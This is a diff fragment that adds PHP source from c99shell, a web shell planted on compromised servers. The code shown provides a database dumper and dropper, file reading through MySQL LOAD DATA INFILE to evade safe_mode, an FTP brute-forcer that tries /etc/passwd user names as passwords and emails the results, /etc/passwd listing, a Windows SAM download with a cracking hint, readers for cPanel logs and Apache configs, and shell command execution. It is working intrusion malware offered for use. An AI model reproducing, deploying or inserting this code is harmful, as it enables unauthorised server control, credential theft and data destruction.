+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = true;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = true;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = false;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));}
+   else {$true = true;}
+   if ($true)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return true;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = false;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
